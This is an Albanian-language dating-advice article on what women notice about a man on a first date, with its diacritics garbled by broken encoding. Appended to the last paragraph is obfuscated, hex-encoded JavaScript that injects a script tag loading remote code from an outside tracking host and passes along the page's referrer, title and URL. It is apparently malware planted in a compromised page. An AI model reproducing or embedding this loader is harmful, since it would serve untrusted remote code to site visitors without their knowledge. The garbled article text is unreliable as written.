How-To-Survice-The-First-Date

A�farA� vA�rejnA� femrat tek mashkulli nA� takimin e parA�

Femrat kryesisht e vlerA�sojnA� njA� mashkull nA� bazA� tA� asaj se A�farA� pA�rshtypje dhuron nA� takimin e parA�, e natyrisht se ajo qA� sA� pari ato vA�rejnA� A�shtA� si duket ai, por ato vA�rejnA� edhe diA�ka tjetA�r…

PA�rshtypja e parA� pA�r dikA�, ndoshta, nuk A�shtA� mA� e rA�ndA�sishmja, por me siguri se e ka peshA�n e vet.

Pesha dhe gjatA�sia
Sa jeni tA� gjatA� dhe sa peshoni A�shtA� gjA�ja e parA� tA� cilA�n shumica e femrave e vA�rejnA�, sepse kA�rkojnA� njA� mashkull i cili ju pA�rshtatet edhe fizikisht. Prandaj, kujdes me trupin dhe mos lejoni qA� tA� shtoni pA�r sA� tepA�rmi nA� peshA�.

Atraktiviteti
Kryesisht meshkujt i dA�gjojmA� se si pranA� vetes kA�rkojnA� njA� femA�r atraktive, por edhe pA�r femrat vlen e njA�jta. Pos atraktivitetit ato dA�shirojnA� qA� mashkulli tA� ketA� stil tA� mirA� tA� flokA�ve, stil tA� veshjes dhe ta mbajA� higjienA�n personale.

Humori
Femrat i tA�rheq buzA�qeshja. NA� takimin e parA� mos jini i mA�rrolur apo tepA�r serioz. Tregoni se keni buzA�qeshje tA� bukur dhe josheni. E, mos harroni se femrave ju pA�lqejnA� meshkujt qA� kanA� sens humori.

VetA�besimi
Meshkujt tA� cilA�t rrezatojnA� me vetA�besim janA� shumA� mA� tA�rheqA�s. Femrave ju nevojitet vetA�m disa minuta pA�r ta vlerA�suar qA� nA� takimin e parA� se sa vetA�besim keni nA� veten tuaj. Po ashtu, mbani mend se arroganca nuk A�shtA� e ngjashme me vetA�besimin.

Komunikimi
Meshkujt nA� takimin e parA� provojnA� ta impresionojnA� femrA�n. MirA�po, ato nuk dA�shirojnA� tA� flisni pA�r veten tuaj, por kanA� dA�shirA� ta��i lini qA� ato vetA� tA� interesohen pA�r gjA�rat. Pra, komunikimi le tA� jetA� i dyfishtA� dhe me kA�tA� rast femrA�n shikojeni nA� sy.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}